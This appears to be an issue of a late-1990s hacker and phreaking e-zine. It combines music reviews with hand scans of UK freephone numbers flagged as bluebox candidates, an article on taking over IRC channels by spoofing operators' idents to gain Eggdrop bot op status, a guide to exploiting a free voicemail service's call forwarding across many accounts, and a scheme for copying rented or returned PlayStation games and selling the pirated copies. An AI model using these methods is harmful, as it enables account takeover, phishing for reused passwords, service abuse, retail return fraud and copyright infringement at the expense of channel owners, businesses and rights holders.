Mmm, Breakbeats :) This song starts off with some lovely breakbeats before dropping into the main loop that isn't too disimilar from another Happycore track which i can't remember the name off. Anyway, this continues for a while, before breaking down a bit and a new instrumental loop starts. This track Seems to be a reflection of the stuff being released in the happy hardcore scene at the moment, and although this track is better than most commercial efforts, it's nowt outstanding.
Title: DipA - The Light Of Love
Reviewed by: CrossFire
Available from: http://www.traxinspace.com/exe-bin/downloadfile.asp?SongID=16622
Style: Dance
Woah! Lovely lovely fantasy style intro :)) This Track is a beauty - It is done in a kind of Demo Style (i mean the kind of music you would hear in a demo), sorta like something you would here in a fantasy game, but a bit more up tempo. The Song itself builds up really nicely, and then as usual starts another instrumental loop. A bit of a short 'un at 2 Minutes 55 secs, but overall an excellent track done by a very nice guy :)
Title: DJ Creativity - Oldskool Vol. 5 (Mixtape)
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Oldskool
No tracklist available
This is proper a oldskool mix. Not just '94-'95 happy hardcore tracks which some people seem to think is oldskool. Most of the tracks are from '92-'93, and there's some excellent tracks on there. The mixing compliments the track selection excellently, everything is nice and smooth - just the way it should be. Excellent stuff.
Title: Modulo-2 - Smile and Nod
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Bit of everything
This is a 14 track album by a Canadian duo. There's a mix of hardcore, happy hardcore, drum 'n' bass and trancecore on here. The standard of production is excellent across the board. I like some of the tracks, and I'm not so keen on others. This is the problem with covering such a range of genres, but I'm certain that there's a bit of something for everybody on this CD. The best track on the CD (IMHO) is definitely Peace Love Unity Revengewhich is an excellent jungle/drum 'n' bass stylee tune. Whatever you're into, I'm sure you'll love this CD.
Disclaimer: If you don't like what we say about your music then tough shit. We both review tracks and mixes fairly regardless of how much we (dis)like the person who made it. These are our opinions. You may not agree with them.
Walrus (ergophobe@dial.pipex.com)
CrossFire (crossfire@hackers-uk.freeserve.co.uk) _____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
0800 Scans
~~~~~~~~~~
By: ergophobe
Before this month's UK hand scans (hopefully a regular feature from now on), a quick note on scanning.
A lot of attention is paid to the 0800 freephone numbers, and consequently numbers change quite a lot, and as new exploits are discovered on 0800 lines they are corrected quickly. This happens less on 0500 numbers, as less attention is paid to them. But these are not the only freephone codes. A quick look in our BT phone directory tells us that there are lots of other freephone codes which are pretty much ignored. Here we have the full listing of all the freephone codes:
0080
014260
014593
014596
014599
018931
0321
0500
0760
0800
0808
09580
In addition to this there are plans to make all 08xx codes freephone. So get out there and get scanning.
Hand Scan of 0800 965 0xx
~~~~~~~~~~~~~~~~~~~~~~~~~
Scan notes:
The 96x xxx range has almost as many country direct numbers as the infamous 89x xxx range, and indeed a lot of the numbers in this scan terminate in foriegn countries. Most of them seem to be in the USA though. I would say that there are probably a few blueboxable numbers amongst this lot though. Anything with "Wierd Tones" next to it is probably worth checking out.
Key:
HU = Hangs Up
Fault = Sorry there is a fault. Please Try Again.
SYCCNBC = Sorry Your Call Can Not Be Completed
Fucked = Nothing happens at all.
01 HU
02 Fault
03 Fault
04 HU
05 Rings - No Answer
06 "Welcome to (can't make out name of service) international. Please enter the card number followed by #"
07 Rings - No Answer
08 Rings - No Answer
09 Fault
10 Fucked
11 Fault
12 HU
13 Lame Canadian business of some discription. Don't attempt to connect to any of their offices, as the music you have to listen to while you're on hold is terrible
14 VMB/PBX
15 Human answer
16 Wierd tones
17 Wierd tones (sounds kinda like an ambulance)
18 Not in service
19 Fault
20 Rings - No Answer
21 HU
22 Rings - No Answer
23 VMB/PBX
24 HU
25 VMB
26 I think this is a French Telco recording saying something along the lines of there is a fault
27 HU
28 HU
29 HU
30 HU
31 Rings - No Answer
32 Human Answer
33 HU
34 HU
35 Korean Telco
36 HU
37 HU
38 HU
39 Rings - No Answer
40 VMB/PBX
41 Rings - No Answer
42 Human Answer
43 HU
44 HU
45 Enter PIN then #
46 Wierd tones
47 HU
48 Enter PIN then #
49 HU
50 Modem/Fax
51 HU
52 HU
53 Modem/Fax
54 SYCCNBC
55 HU
56 HU
57 HU
58 SYCCNBC
59 VMB/PBX
60 Wierd Tones
61 Wierd Tones
62 SYCCNBC
63 Wierd Tones
64 Fucked
65 SYCCNBC
66 SYCCNBC
67 SYCCNBC
68 SYCCNBC
69 HU
70 HU
71 HU
72 Wierd Tones
73 Rings - No Answer
74 HU
75 Wierd Tones
76 HU
77 Wierd Tones
78 Foriegn telco recording: "The number you are calling has not been installed"
79 Wierd Tones
80 "The number has been disconnected"
81 HU
82 Enter PIN then #
83 Alomo rent a car
84 Wierd Tones
85 Please enter PIN then #
86 HU
87 VMB
88 HU
89 Wierd Tones
90 Rings - No Answer
91 Answerphone
92 HU
93 HU
94 HU
95 HU
96 Wierd Tones
97 Rings - No Answer
98 SYCCNBC
99 HU
00 Employee attitude survey
Hand Scan of the first half of 0800 373 8xx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan notes:
No C5 lines or anything in this scan. In fact there's not much of interest at all excpet for a few carriers.
Key:
HU = Hangs Up
HA = Human Answer
NA = No Answer (Lazy Bastards who can't even be bothered to answer their fucking phone)
01 Carrier
02 HU
03 HU
04 NA
05 HU
06 HU
07 HU
08 HU
09 HU
10 NA
11 NA
12 HU
13 HU
14 HU
15 HU
16 HU
17 HU
18 HU
19 Answerphone
20 Answerphone
21 Answerphone
22 HU
23 HU
24 HA
25 This number seems to be permenantly busy
26 HA
27 HA
28 Fax
29 NA
30 NA
31 HU
32 HU
33 HU
34 Answerphone
35 HA
36 HU
37 Some kind of customer support line for Hoover
38 "Sorry. The number you are calling has been changed"
39 HU
40 NA
41 This number seems to be permenantly busy
42 HU
43 Carrier
44 HU
45 HU
46 HU
47 HU
48 HU
49 Answerphone
50 NA
ergophobe Eggdrop Hacking
By The Mob Boss
Eggdrop is the famous Unix-Based bot created some time ago to put an end to channel takeovers in, believe it or not, #Gay. Its main purpose is to run and maintain a channel, protecting it from takeovers and making sure OP status remains in the hands of its owner and those designated to have OP status. Its quite fun, but time consuming to set up. However it has been a valuable tool in maintaining many channels. Even those who are registered with X or W on Undernet keep Eggdrop bots running in their channels. The point of this article is not to talk about setting Eggdrop bots up (since I am making the assumption you already know how) but rather to discuss possible vulnerabilities with these bots. This is not only Eggdrop but IRC channel security. Since it seems channels are always getting taken I thought this might be a good thing to write about.
This is basically how your usual Eggdrop works once it is setup on the channel of its owners choosing. Lets say Joe goes into his channel, #foobar, and wants to get Op'd by his bot. Joe has to message his bot for Op status. Lets say his bots name is Retard. All he has to do is /msg Retard op his-password or he can DCC chat the bot and .op Joe. When he logs in via DCC its called the partyline. Now besides for the password, the ident is what the bot is looking at. That is how he realizes that its Joe. The ident that you see on /whois or when someone enters the channel is what the bot recognizes. If you are not recognized by the bot, then it will just ignore you, meaning /msg and DCC chatting will mean nothing even if you knew the password. Knowing those basics it is easy to see why channels can be considered insecure.
Now, on to how we might exploit a bot for Op status. The first step is surveillance of the channel. The point of the surveillance is to pick up on how it is run and what formalities there are to get Op'd. Also, how many bots are in the channel, the kind of bot (most likely Eggdrop), and of course the nicks and idents of the operators. Please keep in mind that the nick does not matter to the bot it is only the ident (something@127.0.0.1 for example) that it looks at. Now when in the channel it is important to be as covert as possible and to keep good notes, especially of the idents of operators. If you are in fear of being detected it would be wise to use a proxy or wingate when connecting, but something obvious with the abbreviation "proxy" would probably not be too wise. Once you have established who the players are its time to see who you could most easily impersonate. For instance, if you see that five different people get Op'd by the bot then you should take a look at wha!
t their ISPs are. The best thing to look for is someone who is using a national ISP, for example, AOL or Prodigy. The main thing is something that you can get your hands on one way or another (I will not be discussing ripping off ISPs, sorry). Now if your subject happens to be using AOL, hold your breath, and sign on. Then minimize that shitty little browser and head for IRC. Before you log on IRC, though, you should change all the details to those of the subject, the ident, name, email address, even the nick if you feel so inclined. Now, attempt to DCC chat the bot. If you do get that little Eggdrop greeting screen prompting you for your password then your in luck. Now something weird that happened to me once was, when I /msg'ed the bot it seemed to think that I was a new user and he wanted me to set a password, which I did, and then viola I logged in and had OP status. It was clear that whoever it was assigned for did not log into it yet, or there was a misconfiguration.
The point is that if you play around with it long enough your bound to figure a way in because the login process itself is not all that safe. Another possibility is that your target set up their bot to auto-op people, if so then they are pretty dumb since all you have to do is emulate that persons info and you'll have Op status. Now if there is no misconfiguration in the setup of the bot itself you can always try to brute force the bot's password, which of course is not going to be all that easy. One way you might get a password that the target uses is by getting him to sign up with you for something that requires a password. Chances are he uses the same password for many things. If you want to be a script kiddie well you can always go about using a script to do it, it's up to you.
Please use this information in an honorable way. Taking channels is not something that you should make a habit of and I can tell you from experience people get pissed when you do. Make sure the benifits out-way the time and effort it wiil take you. In a lot of instances its completely pointless to attempt to take someone's channel. There is a shot that certain IRCops will get pissed with you as well and attempt to ban you. Just think about what your doing before hand. To those who found this text too basic or lame, why did you bother reading this far?
-The Mob Boss; http://mobboss.dragx.cx
Voice mail and fax: 1-877-203-3043
Edited By Bigh
_____________________
/ * BBS LIST * /|
/____________________/ |
| |M |
| The Sacrifial Lamb|O |
| english.gh0st.net |B |
| | |
| Ripco BBS |B |
| ripco2.ripco.com |O |
| |S |
| The NorthLand |S |
| Underground BBS | |
| nub.dhs.org | |
| | |
| L0pht BBS | |
| bbs.l0pht.com | /
|___________________|/
This has been a publication written by THE MOB BOSS;
He is in no way responsible for the accuracy or results from the use of info in this article.
Anything done is totally done at the users discretion.
THE MOB BOSS in no way or form supports, aids, or participates
in the act of criminal hacking or phreaking.
Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS
are strictly for informational purposes only.
THE MOB BOSS © 1999 all rights reserved
Free Calls With Ureach
By The Mob Boss
Hello boys and girls, I'm hear again with another text for the masses. Today's topic is the wonderful service provided by Ureach.com, the free voice mail, fax, and e-mail service which has been becoming increasingly popular among people in the h/p field. It's a good thing to see that the powers that be have finally caught on to the fact that people won't steal voice mail if you give it to them free. I have been using the service for months now and really love it. Lately though, now that their beta testing is through, they have added some services. One of these new services caught my eye, call fowarding. If you enable the service, which they call ureachme, it will give callers the option, at times you designate, to be automatically fowarded to a number you choose. Now I don't know if they were smoking crack when they decided to initalize this service but they scream, "RAPE ME". This service can be used to call anywhere in the United States on Ureach's nickel if you play your cards right. All you have to do is setup your box to foward to any number you like right? Well this system has some limitations. First of all, this quickly eats your 60 minute per month time alotment, charging you 1.5 minutes for every minute a phone call fowarded from your box is in progress. Another problem is that the person on the recieving end has to decide whether or not to take the call by pressing the number one to accept. This means there will be no fowarding to your favorite PBX or conference number across the country. Now purely in theory if you have someone on the three way you might be able to push yourself through, but I have been unable to test that method. Now if the person knows before hand that you want to give him a ring then of course he will accept. So this can be good for talking to your pals from IRC and at the same time neither one of you have to supply your phone number to the other. The only problem left is that lousy time limit. Well, you can get around that. Now, considering that you can get a 40 minute phone call per fully charged ureach box, just set up as many boxes as you need. After all, they are free and in the words of Homer J. Simpson, "In the great buffet of life you have to pile up your plate and stuff some rolls in your pockets." Now use this sparingly as this will eventually cease to exsist undoubtedly and if you are a real bitch to the poor folks at ureach they might sue you or something. Always remember the accounts you set up, as next month you can use them again. Well there is a new fresh way to communicate with your hack and phreak buddies as much as you like free of charge.
-The Mob Boss; http://mobboss.dragx.cx
Voice mail and fax: 1-877-203-3043
Edited by: SHADOWMOB
_____________________
/ * BBS LIST * /|
/____________________/ |
| |M |
| The Sacrifial Lamb|O |
| english.gh0st.net |B |
| | |
| Ripco BBS |B |
| ripco2.ripco.com |O |
| |S |
| The NorthLand |S |
| Underground BBS | |
| nub.dhs.org | |
| | |
| L0pht BBS | |
| bbs.l0pht.com | /
|___________________|/
This has been a publication written by THE MOB BOSS;
He is in no way responsible for the accuracy or results from the use of info in this article.
Anything done is totally done at the users discretion.
THE MOB BOSS in no way or form supports, aids, or participates
in the act of criminal hacking or phreaking.
Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS
are strictly for informational purposes only.
THE MOB BOSS © 1999 all rights reserved
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
Making Money from your Playstation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By CrossFire
Introduction
------------
Has daddy just bought you a brand spanking new playstation? Have You got a CD Writer? If the answer to both of those questions is yes, read on, if not, go away and read Pokemon Magazine.
What You Need
-------------
Playstation (Preferably chipped)
CD Writer
Account at a local video rental store
Friends
Brain (Optional)
Installing a Mod Chip
---------------------
The first thing you're going to need for this scheme is a Chipped Playstation, basically what this does is tell the playstation that the game is official and not to bother checking it out, so you can play Copied and Imported games. To find a list of suppliers try buying a mag such as Playstation Power, they have companies that will supply chips for as low a price as £5, and most will come with instructions (well I hope they do cos I aint going to tell you here :))
Obtaining The Games
--------------------
There are a few ways to obtain games, but my favourite is by renting them. Go down to your local video shop and join it, this usually is free or costs around £1. Try searching around for the cheapest video stores, and don't even think about using the big players (Blockbuster etc), cos it costs around £4 to rent a normal playstation game from them. Once you've got the game, use your favourite software to copy it (I use Adaptec CD Copier Duluxe, which came with my CD Writer). Pop the game in your newly chipped playstation and see if it works.
Another Method of obtaining games was suggested in A-S 13 (In the warez corner), the basic idea was that you go down to a games store such as Electronic Boutique, buy a game from them, take it home, copy it, then return it to the store (you must have the recipt to do this!), say you weren't satisfied with it (make up an excuse), and they will either give you a refund or credit, preferably credit because you can do it again. Repeat this until you have quite alot of games, then move on to the next step.
Now that you have some games...
-------------------------------
Load up a copy of Paint Shop Pro (Or whatever paint program you use), and make a nice cover for the CD, print it off and stick on CD Case. Write up a catalogue of the games you have, print off a few copies and give to friends. Now sit back and watch as the cash rolls in.
Extras
~~~~~~
A nice little service you should offer your customers is Selling mod chips. In the Afformentioned Playstation Power magazine there are a few services that will sell you mod chips really cheaply, the lowest I have seen is £5. The normal going rate for chips is £10. I think you can guess what happens next :)
The bit at the end
~~~~~~~~~~~~~~~~~~
A short article, but I hope you found it useful. Email all flames etc to crossfire@hackers-uk.freeserve.co.uk
:..::.File 14 Of 14.::..:
:..Disclaimer & The End.:
:.::.:.By Up Staff.:.::.:
_______ _ _______ _
(_______) | (_______) | |
_ | | _ ____ _____ ____ _ | |
| | | || \ / _ ) | ___) | _ \ / || |
| |_____| | | ( (/ / | |_____| | | ( (_| |
\______)_| |_|\____) |_______)_| |_|\____|
<*> Use this information at your own risk. Staff or contributors to
Underground Periodical, nor the persons providing or hosting
Underground Periodical, will NOT assume ANY responsibility for the use,
misuse, or abuse, of any information provided herein. The previous
information is provided for educational purposes ONLY. This information
is NOT to be used for any illegal purposes whatsoever.
<*> By reading Underground Periodical you ARE AGREEING to the following
terms: I understand that using this information is illegal. I agree to,
and understand, that I am responsible for my own actions. If I get into
trouble using this information for the wrong reasons, I promise not to
place the blame on Underground Periodical staff, contributors, or
anyone that provided this issue or any other issue of Underground
Periodical whether it were official or without notification. I
understand that this information is for educational purposes only.
Thanks for reading.
:..::..End Of File..::..:
